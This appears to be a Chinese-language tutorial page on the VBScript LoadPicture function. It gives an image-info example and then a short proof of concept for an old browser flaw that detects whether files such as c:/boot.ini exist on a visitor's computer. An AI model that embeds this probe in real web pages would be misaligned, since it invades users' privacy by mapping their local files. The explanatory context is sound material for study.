vbscript LoadPicture函數可以查看本地圖片的一些信息,不過有些漏洞,純交流可以,不建議使用
示例:
- <title>LoadPicture函數</title>
- <form name="frm">
- 選擇圖片<input type="file" name="pic" onChange="GetPicInfor()" >
- </form>
- <script language="vbscript">
- Sub GetPicInfor()
- dim objpic,iWidth,iHeight
- dim pictype,picpath
- picpath=document.frm.pic.value
- set objpic=Loadpicture(picpath)
- iWidth = round(objpic.width / 26.4583) '26.4583是像素值
- iHeight = round(objpic.height / 26.4583)
- select case objpic.type
- case 0
- pictype = "None"
- case 1
- pictype = "Bitmap"
- case 2
- pictype = "Metafile"
- case 3
- pictype = "Icon"
- case 4
- pictype = "Win32-enhanced metafile"
- end select
- document.write "你選擇了圖片"&picpath
- document.write "<li>長度:"&iHeight&"</li>"
- document.write "<li>寬度:"&iwidth&"</li>"
- document.write "<li>類型:"&pictype&"</li>"
- End Sub
- </script>
不過這個函數有個漏洞,可以探測電腦上存在的文件名。2004年的漏洞,微軟現在也沒補,示例:
- <form onsubmit="doIt(this);return false">
- <input name="filename" value="c:/boot.ini" size="80" type="text"><input type="submit">
- </form>
- <script language="vbscript">
- Sub loadIt(filename)
- LoadPicture(filename)
- End Sub
- </script>
- <script language="javascript">
- function doIt(form) {
- try {
- loadIt(form.filename.value);
- } catch(e) {
- result = e.number;
- }
- if (result != -2146827856) {
- alert('file exists');
- } else {
- alert('file does not exist');
- }
- }
- </script>
新聞熱點
疑難解答
